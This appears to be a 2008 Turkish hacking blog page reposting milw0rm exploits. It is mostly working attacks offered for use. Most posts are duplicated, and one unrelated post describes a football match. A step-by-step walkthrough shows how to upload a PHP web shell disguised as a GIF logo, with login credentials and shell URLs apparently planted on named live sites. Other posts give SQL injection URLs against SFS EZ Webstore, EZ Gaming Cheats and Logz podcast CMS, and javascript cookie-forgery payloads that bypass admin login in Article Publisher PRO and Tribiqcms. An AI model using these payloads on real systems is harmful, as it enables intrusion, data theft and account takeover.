http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
XSS example:
http://www.apt.cc/listtest.php?r=[XSS]
---------------------------------------------------------------------------
you must have a minimal shell ( example 40 kb ) (kucuk bir shell in olmalI )
and you add this code your shell to head
GIF89a; (en uste bu kodu ekle )
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php ( isim ver ve kaydet )
----------------------------------------------------------------------------
you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol )
and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap )
after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] )
or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla )
and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et )
after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin )
if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI )
after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy
after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla
acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas )
your_shell.php
http://localhost/script_path/Member_Admin/logo/[id]your_shell.php
-------------------------------------------------------------------------------
example 1 (demo):
http://www.downlinegoldmine.com/apartment/Member_Admin/index.php
email: zorlu@w.cn
password: 123456
or direckt going: http://www.downlinegoldmine.com/apartment/Member_Admin/login.php?c=4806666
edit logo: http://www.downlinegoldmine.com/apartment/Member_Admin/editimage.php?clientid=4806666
and shell.php
http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php
example 2:
http://www.apt.cc/Member_Admin/index.php
email: zorlu@w.cn
password: 123456
or direckt going: http://www.apt.cc/Member_Admin/login.php?c=4871187
edit logo: http://www.apt.cc/Member_Admin/editimage.php?clientid=4871187
and shell.php
http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php
Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability
Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability
link: http://www.milw0rm.com/exploits/6929
Discovered By: ZoRLu
demo admin login:
http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
demo user login:
http://demo-article-publisher-pro.phparticlescript.com/login.php
admin_name: admin
passwd: demo
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
user_id: 1
or
user_name: zorlu
passwd: zorlu
passwd_md5: 2178fb3ee4a88f946ecb68734b266c10
user_id: 6
or
user_name: demo
passwd: demo
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
user_id: 2
exploit:
admin:
javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";
user:
javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";
for demo admin: ( user_id: 1)
javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
for demo user: ( for user zorlu user_id: 6 )
javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";
for demo user: ( for user demo user_id: 2 )
javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
link: http://www.milw0rm.com/exploits/6929
Discovered By: ZoRLu
demo admin login:
http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
demo user login:
http://demo-article-publisher-pro.phparticlescript.com/login.php
admin_name: admin
passwd: demo
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
user_id: 1
or
user_name: zorlu
passwd: zorlu
passwd_md5: 2178fb3ee4a88f946ecb68734b266c10
user_id: 6
or
user_name: demo
passwd: demo
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
user_id: 2
exploit:
admin:
javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";
user:
javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";
for demo admin: ( user_id: 1)
javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
for demo user: ( for user zorlu user_id: 6 )
javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";
for demo user: ( for user demo user_id: 2 )
javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
1 Kasım 2008 Cumartesi
SFS EZ Webstore (where) Remote SQL Injection Vulnerability
SFS EZ Webstore (where) Remote SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/6922
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]
[SQL]=
ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
demo
http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
link: http://www.milw0rm.com/exploits/6922
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]
[SQL]=
ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
demo
http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability
SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability
link: http://www.milw0rm.com/exploits/6924
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/view_reviews.php?id=[SQL]
[SQL]=
-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
demo
http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
link: http://www.milw0rm.com/exploits/6924
Discovered By: ZoRLu
Exploit:
http://localhost/script_path/view_reviews.php?id=[SQL]
[SQL]=
-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
demo
http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
eskişehir fenerbahçe maçı
şuan maçı izliyorum ulan helal olsun eskişehire. ben Galatasaraylıyım ama adamlar hem Galatasaray'a hemde fenerbahçeye alın teri döktürdüler. biliyorsunuz Cimbom yenildi bakalım fenerbahçe napacak skor şuan 2-2 ve dakka 68 : )
Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability
Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability
kaynak: http://www.milw0rm.com/exploits/6896
Discovered By: ZoRLu
file:
fichiers/add_url.php
code:
if (isset($_GET['art'])) {
$Article = $_GET['art'];
...
$Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions;
$ResultRequete = requete_mysql($Requete);
Exploit:
http://localhost/script_path/fichiers/add_url.php?art=[SQL]
[SQL]= column number 1 (SELECT TITRE FROM ...)
1'+union+select+concat(user(),0x3a,database())/*
example:
http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/*
kaynak: http://www.milw0rm.com/exploits/6896
Discovered By: ZoRLu
file:
fichiers/add_url.php
code:
if (isset($_GET['art'])) {
$Article = $_GET['art'];
...
$Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions;
$ResultRequete = requete_mysql($Requete);
Exploit:
http://localhost/script_path/fichiers/add_url.php?art=[SQL]
[SQL]= column number 1 (SELECT TITRE FROM ...)
1'+union+select+concat(user(),0x3a,database())/*
example:
http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/*
31 Ekim 2008 Cuma
Tribiqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability
Tribiqcms 5.0.9a (beta) Insecure Cookie Handling Vulnerability
Discovered By: ZoRLu
code:
setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');
Exploit:
javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
example for my localhost:
javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
kaynak: http://www.milw0rm.com/exploits/6886
Discovered By: ZoRLu
code:
setcookie ("COOKIE_LAST_ADMIN_USER", $newAdmin["username"], time()+8640000, '/');
setcookie ("COOKIE_LAST_ADMIN_LANG", $newAdmin["use_language_id"], time()+8640000, '/');
Exploit:
javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=real_admin_name; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
example for my localhost:
javascript:document.cookie = "COOKIE_LAST_ADMIN_USER=zorlu; path=/"; document.cookie = "COOKIE_LAST_ADMIN_LANG=en-GB; path=/";
kaynak: http://www.milw0rm.com/exploits/6886
Kaydol:
Kayıtlar (Atom)